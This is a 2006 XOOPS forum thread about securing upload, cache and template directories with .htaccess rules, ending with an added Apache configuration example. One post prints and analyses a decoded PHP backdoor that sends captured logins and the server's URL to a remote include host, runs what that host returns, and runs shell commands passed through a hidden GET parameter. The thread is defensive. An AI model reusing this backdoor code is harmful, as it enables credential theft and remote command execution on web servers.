11
OldFriend
Re: System Security.
  • 2006/8/26 12:38

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


Quote:

The 3 directories along with their subdirectories are:
cache
templates_c
uploads

I would also suggest that you protect these directories by placing a .htaccess file in each of these directories with
Deny from all


Hmmmmm, it seems that this .htaccess works only for the cache and the templates_c directory.

I just noticed that in the uploads directory that it prevents any uploaded images from being displayed.

Does anyone know if there is another .htaccess method that will allow these images to be displayed but prevent any *.php files from being executed?

12
Dave_L
Re: System Security.
  • 2006/8/26 13:43

  • Dave_L

  • XOOPS is my life!

  • Posts: 2277

  • Since: 2003/11/7


<Files *.php>
Deny from all
</Files>

13
iHackCode
Re: System Security.

Quote:

OldFriend wrote:
Quote:

The 3 directories along with their subdirectories are:
cache
templates_c
uploads

I would also suggest that you protect these directories by placing a .htaccess file in each of these directories with
Deny from all


Hmmmmm, it seems that this .htaccess works only for the cache and the templates_c directory.

I just noticed that in the uploads directory that it prevents any uploaded images from being displayed.

Does anyone know if there is another .htaccess method that will allow these images to be displayed but prevent any *.php files from being executed?


for my uploads directory i got something like:
Quote:
Order Deny,Allow
Deny from all
<FilesMatch "\.(gif|jpe?g|png)$">
Allow from all
</FilesMatch>

only the .gif .jpg .jpeg and .png image files are web accessible in that directory. the rest of the files in that directory get a 404
CBB / LatestNews / Publisher / XM-Spotlight

(ノ◕ヮ◕)ノ*:・゚✧

14
OldFriend
Re: System Security.
  • 2006/8/26 22:34

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


Quote:

Dave_L wrote:
<Files *.php>
Deny from all
</Files>


Quote:

Bandit-X wrote:

Quote:
Order Deny,Allow
Deny from all
<FilesMatch "\.(gif|jpe?g|png)$">
Allow from all
</FilesMatch>

only the .gif .jpg .jpeg and .png image files are web accessible in that directory. the rest of the files in that directory get a 404


More than one way to skin a cat. Thanks.

15
Dave_L
Re: System Security.
  • 2006/8/26 23:13

  • Dave_L

  • XOOPS is my life!

  • Posts: 2277

  • Since: 2003/11/7


Bandit-X's solution is better than mine, since it blocks other potentially dangerous file types.

16
ChrisG
Re: System Security.
  • 2006/8/28 12:47

  • ChrisG

  • Just popping in

  • Posts: 1

  • Since: 2006/8/28


Little insight into the script posted in one of the first topics... (decoded the base64), which has the following as result:


error_reporting(0);

if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){
        $user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
    }else{
        $user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
    }
}else{
    $user_auth="";
}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
// phones home with the server IP, the requested URL and any captured login, and runs whatever the remote script returns
if(! @include_once("http://bis.iframe.ru/master.php?r_addr=".sprintf("%u",ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg))
{
    // fallback when the remote include fails
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active".`uname -a`;}
}


logic:

1. Disable all error reporting (^ALL)
2. See if the POST vars l or p were set?

Now it gets funny ;)

3. If $_POST['input'] was touched (any value), then set $user_auth as follows:

&l=(value from $_POST["l"])&p=(md5 hash of $_POST["p"])

where $_POST["p"] is usually the method used for database authentication, and this is actually a URI.

4. Else:

&l=(value from $_POST["l"])&p=(text-based $_POST["p"]). Prob because the password is already in md5 format when input isn't set.

5. If $_POST["l"] and $_POST["p"] aren't set, $user_auth = "";

// Next the tricky part comes. This is also why he prob set the error reporting to (0).

First he checks if some $_POST['log_flg'] is set; if that is the case, $log_flg gets the designated value.

Then he checks the command "include_once("http://bis.iframe.ru/master.php?r_addr=010.025.251.010&url=(servername)(uri)($user_auth)($log_flg))"

He includes some script he owns. Will try to fetch this include in a var and print it lol :P

Next he executes both the system($_GET['']) < of which I have no clue what it means, and he executes 'uname -a' on the command prompt (which is obviously a Linux shell command) and prints it to the screen.

So the whole script was designed to fish user information (and more) from the server it was run on. I'm only very interested in what the "master.php" includes...

17
OldFriend
Re: System Security.
  • 2006/8/29 12:53

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


Very interesting. Thank you for that.

Now, my only question is this: Did he actually get "user information (and more) from the server it was ran on"?

18
svaha
Re: System Security.
  • 2006/9/7 20:51

  • svaha

  • Just can't stay away

  • Posts: 896

  • Since: 2003/8/2 2


Quote:

Bandit-X wrote:

for my uploads directory i got something like
:
Quote:
Order Deny,Allow
Deny from all
<FilesMatch "\.(gif|jpe?g|png)$">
Allow from all
</FilesMatch>

only the .gif .jpg .jpeg and .png image files are web accessible in that directory. the rest of the files in that directory get a 404


If I place this in a 'root' directory, are the subdirectories also 'protected', or must I place this htaccess file in every subdirectory also?
What doesn't kill me,
makes me stronger.

http://exm.amevita.eu
http://www.amevita.eu
http://www.alohaspirit.nl

19
iHackCode
Re: System Security.

It's a bit strict, but it should affect subdirectories too.
CBB / LatestNews / Publisher / XM-Spotlight

(ノ◕ヮ◕)ノ*:・゚✧

20
nekro
Re: System Security.
  • 2006/9/8 3:54

  • nekro

  • Quite a regular

  • Posts: 213

  • Since: 2005/11/9


I should configure my Apache to make the .htaccess files work, no???

Can someone tell me how to activate that???
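The uploads-directory rules from earlier in this thread, extended as an added example that no poster supplied, covering the two later questions (whether the file reaches subdirectories, and what Apache must allow before any .htaccess takes effect). The directory path, the PHP extension list and the use of mod_php are assumptions.

```apache
# Added example, not posted by anyone in this thread: an uploads/.htaccess
# that keeps the image allow-list from above and also refuses to execute
# anything that lands there. Path and extension list are assumptions.
# A .htaccess applies to its own directory and every subdirectory below it
# (unless a deeper .htaccess overrides a directive), so one copy in
# uploads/ covers the whole tree.

# 1. Access control as posted (Apache 2.2 syntax): only images are served.
#    On Apache 2.4 these four lines need mod_access_compat loaded.
Order Deny,Allow
Deny from all
<FilesMatch "\.(gif|jpe?g|png)$">
    Allow from all
</FilesMatch>
# Apache 2.4 native equivalent of the four lines above:
#   Require all denied
#   <FilesMatch "\.(gif|jpe?g|png)$">
#       Require all granted
#   </FilesMatch>

# 2. Defence in depth. The allow-list checks only the final extension, so a
#    name like "x.php.jpg" passes it, and Apache's multiple-extension
#    handling can still route such a file to the PHP module when ".php" has
#    a handler or type mapped higher up. Remove those mappings here and make
#    every file a plain static download.
#    php_flag is only understood when PHP runs as an Apache module; with
#    PHP as CGI/FastCGI drop that one line or Apache returns a 500.
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5
RemoveType    .php .phtml .php3 .php4 .php5
SetHandler default-handler

# 3. No CGI execution and no directory listings inside uploads/.
Options -ExecCGI -Indexes

# None of this takes effect unless httpd.conf permits overrides for the
# directory. Access directives need "Limit", handler/type changes need
# "FileInfo", and php_flag/Options need "Options":
#
#   <Directory "/var/www/xoops/uploads">
#       AllowOverride Limit FileInfo Options
#   </Directory>
```

After changing AllowOverride, restart Apache and confirm with a harmless test file (for example a text file named test.php.jpg) that it comes back as a download rather than being interpreted.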
